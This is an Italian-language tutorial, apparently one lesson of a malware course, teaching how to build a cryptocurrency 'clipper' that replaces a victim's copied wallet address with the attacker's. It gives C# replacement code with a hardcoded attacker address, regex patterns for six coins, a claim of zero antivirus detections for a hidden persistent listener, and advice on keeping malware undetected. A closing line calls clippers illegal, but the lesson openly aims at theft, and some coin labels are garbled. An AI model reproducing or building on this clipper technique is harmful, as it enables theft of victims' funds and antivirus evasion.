Lezione 12: Crypto Clipper: rubare criptovalute come un professionista
Di seguito è riportato l'elenco degli argomenti della lezione 12:
12. Crypto Clipper:
⇢ BTC
⇢ ETH
⇢ Ripple
⇢ Litecoin
⇢ BTC Cash
⇢ Monero
altro...
In questa lezione dimostreremo come aggiungere funzionalità in grado di rubare criptovaluta sostituendo l'indirizzo del portafoglio dell'utente con l'indirizzo dell'aggressore. Nella lezione 9 abbiamo imparato a rubare criptovaluta dai portafogli offline presenti sulla macchina bersaglio. Tratteremo le criptovalute più popolari, come BTC, ETH, Ripple, Litecoin, BTC Cash e Monero in questa lezione. Imparerai come sviluppare una funzione nel tuo malware in grado di sostituire l'indirizzo del portafoglio del destinatario nella memoria degli appunti con il tuo. Questa tecnica semplice ma efficace può aiutarti a rubare criptovaluta senza essere scoperto. Unisciti a noi per scoprire come diventare un professionista nel rubare criptovalute con Crypto Clipper!
Di seguito è riportata la comprensione di base del funzionamento. Controlla l'indirizzo dell'utente utilizzando un modello di espressione regolare e, se l'indirizzo corrisponde, sostituisce l'indirizzo dell'utente con l'indirizzo dell'aggressore.
// clipper
// attacker address
string attackerAddress = "1FfmbHfnpaZjKFvyi1okTjJJusN455paPH";
// user address
string userAddress = "bc1qxy2kgdygjrsqtzq2n0yrf2493p83kkfjhx0wlh";
// regex pattern to match user's address
string regexPattern = @"^bc[13][a-zA-HJ-NP-Z0-9]{25,39}$";
// Check address matches regex pattern
if (Regex.IsMatch(userAddress, regexPattern))
{
// Replace user address with attacker address
userAddress = attackerAddress;
// Display message to confirm replacement
Console.WriteLine("User's address has been replaced with attacker's address.");
}
else
{
// Display message if user's address does not match regex pattern
Console.WriteLine("User's address is invalid and cannot be replaced.");
}
Di seguito sono riportati i pattern regex per altri indirizzi crittografici:
Bitcoin
string regexPattern = @"^(bc1|[13])[a-zA-HJ-NP-Z0-9]{25,39}$";
ETH
string regexPattern = @"^0x[a-fA-F0-9]{40}$";
Ondulazione
string regexPattern = @"^r[0-9a-zA-Z]{24,34}$";
Bitcoin
string regexPattern = @"^[LM3][a-km-zA-HJ-NP-Z1-9]{26,33}$";
Contanti BTC
string regexPattern = @"^([qpzry9x8gf2tvdw0s3jn54khce6mua7l]{42}|(bitcoincash:)?(q|p)[a-z0-9]{41})$";
Monero
string regexPattern = @"^4[0-9AB][1-9A-HJ-NP-Za-km-z]{93}$";
Infine, ho compilato tutti gli argomenti della lezione 12 e ho anche aggiunto un ascoltatore persistente in modo che possa essere elencato per sempre nei valori degli appunti in background e anche il processo è nascosto, in seguito è stato rilevato da 0 su 26 scansioni antivirus.
Ricorda: non condividere i tuoi assembly non crittografati o la fonte di malware con scanner antivirus casuali, utilizza solo quelli elencati nell'articolo riportato di seguito per mantenere il tuo malware non rilevato per sempre:
Conclusione
"Clipper" è un tipo di programma dannoso utilizzato dagli hacker per rubare criptovaluta dalle vittime sostituendo i loro indirizzi di portafoglio con l'indirizzo dell'aggressore. Può essere distribuito tramite e-mail di phishing, siti Web dannosi o persino app store legittimi. Le vittime possono subire perdite finanziarie significative e l'uso del malware clipper è illegale e non etico. Buone pratiche di sicurezza informatica possono aiutare a proteggere dal malware Clipper e da altri tipi di attacchi informatici.

![Che cos'è un elenco collegato, comunque? [Parte 1]](https://post.nghiatu.com/assets/images/m/max/724/1*Xokk6XOjWyIGCBujkJsCzQ.jpeg)



































